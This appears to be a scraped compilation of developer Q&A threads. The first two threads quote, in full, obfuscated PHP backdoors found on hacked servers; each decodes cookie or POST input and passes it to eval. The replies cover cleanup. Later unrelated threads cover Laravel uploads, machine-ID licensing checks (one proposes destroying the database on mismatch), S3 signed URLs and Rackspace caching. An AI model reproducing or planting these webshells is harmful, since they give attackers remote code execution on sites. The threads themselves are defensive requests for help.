I am facing with an issue. Everyday on my server appers .ico files and .php file with this kind of code:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\'';$yjzgov =
Array();$yjzgov[] =
$zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[]
= $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[]
= $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[]
= $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[]
= $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11];$yjzgov[]
= $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[]
= $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[]
= $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function
frtdmz($yjzgov, $xtfjdc, $omljrbn){return
$yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn /
$yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov,
$xwoin){return #$yjzgov[9]($yjzgov[1], $xwoin);}function
twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn)
{eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov,
$jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^
frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}
Could you please tell me what should I do?
I am using rackspace hosting. Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log.
How can I stop that?
Thanks in advance!
Hacked. I was recently cleaning hacked site my self and it was nightmare. Best would be to retrieve some recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:
Clean all the files with malicious content. Go search/replace trough all the files.
Dump database and do the same thing to dump file - remove malicious content and then import it back.
Check for user accounts. If there are some suspicious one block/delete them.
Check for newly created suspicious user groups. Delete them too.
Make a backup.
Apply all security updates/patches. Make fresh backup again.
Change all account passwords (drupal admins, ftp accounts, database accounts).
Set scheduled backup. I.e. use Becakup&Migrate module for that.
Related
Am creating a REST api with laravel that allows a user to select an image file from their android device, then upload it to the server. The mage is converted to base64 before it's sent to the server alongside other parameters. I want to convert this base64 to a file and store it on the server then generate a link that can be used to access it. here is what i have tried so far and it doesnt work: I have already created a symlink to storage
public function create(Request $request)
{
$location = new Location();
$location->name = $request->location_name;
$location->latitude = $request->latitude;
$location->longitude = $request->longitude;
$location->saveOrFail();
$provider = new Provider();
$provider->name = $request->provider_name;
$provider->location_id = $location->id;
$provider->category_id = $request->category_id;
$provider->description = $request->description;
$provider->image = request()->file(base64_decode($request->encoded_image))->store('public/uploads');
$provider->saveOrFail();
return json_encode(array('status'=>'success', 'message'=>'Provider created successfully'));
}
As already commented by Amando, you can use the Intervention/Image package, having used it for many years I can say it will do what you want and very well.
What I would also add though, is you may also want to consider, whether you indeed need to store it as a file at all.
Depending on what it will be used for, and the size etc, you could consider storing it in the DB itself, along with any other information. This removes the dependency on a file server, and will make your application much more flexible with regards to infrastructure requirements.
At the end of the day, files are just data, if you will always get the file when you get the other data, reduce the steps and keep related data together.
Either way, hope you get it sorted :)
I am sorry to ask a silly question but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know little bit PHP but this is a very strange code inside the PHP code. I am sure that it is not PHP functions. I don't know what is this code about.
Is my website compromised? Can some tell me that they can do with my website through this code. I am raising this question here because maybe this can help some one to save their websites.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
#$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
{
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
{
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
{
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
}
}
return $ua52559;
}
function y10245($rcc6ec6, $r8c6)
{
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
if (!$rcc6ec6)
{
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
}
$rcc6ec6 = #$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
{
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
);
echo #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
}
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
{
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
}
exit();
}
(I'm not able yet to answer)
I had similar code on a customer website with a joomla install, several times.
If your webhost hasn't a code-checker were it blacklists hacked files, you should have to search the whole public_html directory.
I had one recent case where the code included several new files in a wordpress install, across different folders and some hidden with even meaningful names. I had to go thorugh every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.
But usually I radically delete sections and files with encrypted code, they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x 's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
becomes:
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG#fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.
You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing. Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.
I've created an application using PHP and I'm going to sell it to my local market. I will personally be going to their locations to install/configure Apache & MySQL as well as installing my own code.
I would like a security system so that if anyone attempts to copy my code to an unauthorized machine, it won't run.
I know no one can prevent reverse engineering an application. even .exe (binary) files are cracked and with PHP (source code) anyone can do.
In my country those reverse engineers are really hard to find, so I would like to propose minimal security options like:
1) Create class (say, Navigation) which identifies system information like CPU ID, Computer name or any combination of hardware ID to make a UNIQUE_ID and matches with my given UNIQUE_ID (to the individual to whom I sold the application). If it's valid, it returns the navigation menu. Otherwise it will simply destroy the database and halt the execution by throwing an exception, maybe like:
class Navigation {
public function d() {
return current system UNIQUE_ID;
}
public function get() {
$a = file_get_contents('hash');
$c = $this->d();
if (crypt($c) != $a) {
//destory database
throw new Exception('');
} else {
return "<ul><li><a>home</a></li></ul>"; //navigation menu
}
}
}
2) Then during the installation process I'll change system UNIQUE_ID in "hash" file, create an object, and save it into a file (nav.obj):
(install.php)
<?php
$a=new Navigation;
$out=serialize($a);
file_put_contents('nav.obj', $out);
3) in header.php (which gets included in every file):
<?php
$menu=file_get_contents('nav.obj');
$menu=unserialize($a);
echo $menu->get();
?>
I know this method isn't full proof, but I'm pretty sure that around 60% of PHP developers won't be able to crack it!
Now I only need to get current system UNIQUE_ID.
I have created this function to get an unique ID based on hardware (Hard disk UUID). It is possible to use different resources like machine names, domains or even hard disk size to get a better approach depending on your needs.
function UniqueMachineID($salt = "") {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$temp = sys_get_temp_dir().DIRECTORY_SEPARATOR."diskpartscript.txt";
if(!file_exists($temp) && !is_file($temp)) file_put_contents($temp, "select disk 0\ndetail disk");
$output = shell_exec("diskpart /s ".$temp);
$lines = explode("\n",$output);
$result = array_filter($lines,function($line) {
return stripos($line,"ID:")!==false;
});
if(count($result)>0) {
$result = array_shift(array_values($result));
$result = explode(":",$result);
$result = trim(end($result));
} else $result = $output;
} else {
$result = shell_exec("blkid -o value -s UUID");
if(stripos($result,"blkid")!==false) {
$result = $_SERVER['HTTP_HOST'];
}
}
return md5($salt.md5($result));
}
echo UniqueMachineID();
As per http://man7.org/linux/man-pages/man5/machine-id.5.html
$machineId = trim(shell_exec('cat /etc/machine-id 2>/dev/null'));
EDIT for Tito:
[ekerner#**** ~]$ ls -l /etc/machine-id
-r--r--r--. 1 root root 33 Jul 8 2016 /etc/machine-id
EDIT 2 for Tito: Some things to consider and scenarios:
Is the user allowed to get a new machine? Id guess yes.
Or run on multiple devices?
Sounds like the machine could be irrelevant in your case?
If its user only (no machine restrictions) then Id go for a licencing service (relies on network).
There are many services for this:
Google Play (for Android apps) is a good example: https://developer.android.com/google/play/licensing/index.html
MS and Apple have similar services.
However just search the web for the term "Software Licensing Service" or "Cloud Based Software Licensing Service".
If its user + single device, then youll need to pass up the device id to whatever service you use or make, then allow the machine id to be updated, but not allow revert to previous machine id (would mean multiple devices).
However said services will give you the client code which should take care of that if its a requirement.
Two scenarios from experience:
1: User on any device: we simply made an API in the cloud (in a website) and a login screen in the app, when the user logged in it authenticated via the API and kept a token, and whenever the device was connected to the net the app would query the API and update the login and/or token.
You could alternatively have the login screen in the purchase (like maybe they already logged into a site to purchase), generate a key and pack it with or bind it into the app.
2: User plus machine:
Same thing except when the API is queried the machine id is passed up. The machine ID can change as many times as the user updates their device, but we kept a record of machine ids and made to ban rule on: if we saw an old (previously used) machine id then a certain amount of time had to have passed. Thus allowed the user to break their machine and pull out an old one.
Also to consider if you make one, how will you stop the app from working? Ppl are pretty clever it will need to be core compiled.
However that all being said, the various licensing services are pro at this and can cater for most needs. Plus in their experience theyve already overcome the security pitfalls. Id name one that I like except its yours to search out.
Nice if you can come on back with and positive or negative outcomes from your trails.
function getMachineId() {
$fingerprint = [php_uname(), disk_total_space('.'), filectime('/'), phpversion()];
return hash('sha256', json_encode($fingerprint));
}
This will get a probably-unique id based on a hash of:
The server's OS, OS version, hostname, and architecture.
The total space (not free space) on the drive where the php script is.
The Unix timestamp creation time of the computer's root file system.
The currently installed PHP version.
Unlike the other answers it doesn't depend on shell_exec() being enabled.
I have an app that uploads user files to S3. At the moment, the ACL for the folders and files is set to private.
I have created a db table (called docs) that stores the following info:
id
user_id
file_name (original file as specified by the user)
hash_name (random hash used to save the file on amazon)
So, when a user wants to download a file, I first check in the db table that they have access to file. I'd prefer to not have the file first downloaded to my server and then sent to the user - I'd like them to be able to grab the file directly from Amazon.
Is it OK to rely on a very very long hashname (making it basically impossible for anyone to randomly guess a filename)? In this case, I can set the ACL for each file to public-read.
Or, are there other options that I can use to serve the files whilst keeping them private?
Remember, once the link is out there, nothing prevents a user from sharing that link with others. Then again, nothing prevents the user from saving the file elsewhere and sharing a link to the copy of the file.
The best approach depends on your specific needs.
Option 1 - Time Limited Download URL
If applicable to your scenario, you can also create expiring (time-limited) custom links to the S3 contents. That would allow the user to download content for a limited amount of time, after which they would have to obtain a new link.
http://docs.amazonwebservices.com/AmazonS3/latest/dev/S3_QSAuth.html
Option 2 - Obfuscated URL
If you value avoiding running the file through your web server over the risk that a URL, however obscure, might be intentionally shared, then use the hard-to-guess link name. This would allow a link to remain valid "forever", which means the link can be shared "forever".
Option 3 - Download through your server
If you are concerned about the link being shared and certainly want users to authenticate through your website, then serve the content through your website after verifying user credentials.
This option also allows the link to remain valid "forever" but require the user to log in (or perhaps just have an authentication cookie in the browser) to access the link.
I just want to post the PHP solution with code, if anybody has the same problem.
Here's the code I used:
$aws_access_key_id = 'AKIAIOSFODNN7EXAMPLE';
$aws_secret_key = 'YourSecretKey12345';
$aws_bucket = 'bucket';
$file_path = 'directory/image.jpg';
$timeout = '+10 minutes';
// get the URL!
$url = get_public_url($aws_access_key_id,$aws_secret_key,$aws_bucket,$file_path,$timeout);
// print the URL!
echo($url);
function get_public_url($keyID, $s3Key, $bucket, $filepath, $timeout)
{
$expires = strtotime($timeout);
$stringToSign = "GET\n\n\n{$expires}\n/{$aws_bucket}/{$file_path}";
$signature = urlencode(hex2b64(hmacsha1($s3Key, utf8_encode($stringToSign))));
$url = "https://{$bucket}.s3.amazonaws.com/{$file_path}?AWSAccessKeyId={$keyID}&Signature={$signature}&Expires={$expires}";
return $url;
}
function hmacsha1($key,$data)
{
$blocksize=64;
$hashfunc='sha1';
if (strlen($key)>$blocksize)
$key=pack('H*', $hashfunc($key));
$key=str_pad($key,$blocksize,chr(0x00));
$ipad=str_repeat(chr(0x36),$blocksize);
$opad=str_repeat(chr(0x5c),$blocksize);
$hmac = pack(
'H*',$hashfunc(
($key^$opad).pack(
'H*',$hashfunc(
($key^$ipad).$data
)
)
)
);
return bin2hex($hmac);
}
function hex2b64($str)
{
$raw = '';
for ($i=0; $i < strlen($str); $i+=2)
{
$raw .= chr(hexdec(substr($str, $i, 2)));
}
return base64_encode($raw);
}
Hey Guys,
I was bent on improving my page speed factors and yesterday I got some cloud space on rackspacecloud. Now before this i was serving static content from a cookieless domain with proper cache control through htaccess.
Now after I moved on to cloud my htaccess does not control the cloud files. There is a TTL parameter on rackspace that sets values for how long the files should stay on CDN. That value reflects on my Page Speed settings (google + firebug). Now the default setting can me maximum 72 hours but I need something above 7 days. I need some api for that and its kinda complex..
Is there any way I can enforce cache control on my cloud files?
what do these query strings do domain.com/file.css?cache=0.54454334 ???
Do they achieve what I am looking for?
Any help is appreciated.
You may have figured it out already, but heres a link to checkout: Set far-future expires headers with Rackspace Cloud Files (sort of).
He is using the cloudfiles PHP API, and so am I. You can manually set the TTL (aka expires) headers to whatever you want to. Right now I have them set to 365 days (maybe a little excessive).
The documentation is fairly straightforward. If you need any help, this code should help you get started:
<?php
// include the API
require('cloudfiles.php');
// cloud info
$username = "myusername"; // username
$key = "c2dfa30bf91f345cf01cb26d8d5ea821"; // api key
// Connect to Rackspace
$auth = new CF_Authentication($username, $key);
$auth->authenticate();
$conn = new CF_Connection($auth);
// Get the container we want to use
$container = $conn->create_container('images');
// store file information
$filename = "images/logo.jpg";
// upload file to Rackspace
$object = $container->create_object($filename);
$object->load_from_filename($localfile);
// make public, and set headers
$container->make_public(86400 * 365); // expires headers set to 365 days
?>